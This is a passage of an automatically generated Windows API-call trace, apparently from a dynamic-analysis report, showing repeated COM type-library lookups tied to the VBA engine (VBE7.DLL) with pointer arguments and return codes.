ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.526] IUnknown:Release (This=0x665ba50) returned 0xd [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.527] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.527] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.527] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.527] IUnknown:Release (This=0x665ba50) returned 0xd [0069.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.527] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.527] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.527] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.527] IUnknown:Release (This=0x665ba50) returned 0xd [0069.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.527] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.527] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.527] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.527] IUnknown:Release (This=0x665ba50) returned 0xd [0069.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.528] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.528] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.528] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.528] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.528] IUnknown:Release (This=0x665ba50) returned 0xd [0069.528] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.528] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.528] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.528] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.528] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.528] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.528] IUnknown:Release (This=0x665ba50) returned 0xd [0069.528] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.528] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.528] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.528] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.528] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.528] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.528] IUnknown:Release (This=0x665ba50) returned 0xd [0069.528] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.529] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.529] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.529] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.529] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.529] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.529] IUnknown:Release (This=0x665ba50) returned 0xd [0069.529] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.529] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.529] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.529] IMalloc:Realloc (This=0x7fefec05380, pv=0xaffde90, cb=0x1c10) returned 0xaffde90 [0069.529] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.529] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.529] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.529] IUnknown:Release (This=0x665ba50) returned 0xd [0069.529] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.529] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.529] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.529] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.530] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.530] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.530] IUnknown:Release (This=0x665ba50) returned 0xd [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.530] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.530] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.530] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.530] IUnknown:Release (This=0x665ba50) returned 0xd [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.530] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.530] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.530] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.530] IUnknown:Release (This=0x665ba50) returned 0xd [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.530] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.530] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.531] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.531] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.531] IUnknown:Release (This=0x665ba50) returned 0xd [0069.531] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.531] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.531] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.531] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.531] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.531] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.531] IUnknown:Release (This=0x665ba50) returned 0xd [0069.531] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.531] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.531] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.531] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.531] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.531] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.531] IUnknown:Release (This=0x665ba50) returned 0xd [0069.531] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.532] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.532] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.532] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.532] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.532] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.532] IUnknown:Release (This=0x665ba50) returned 0xd [0069.532] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.532] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.532] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.532] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.532] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.532] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.532] IUnknown:Release (This=0x665ba50) returned 0xd [0069.532] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, 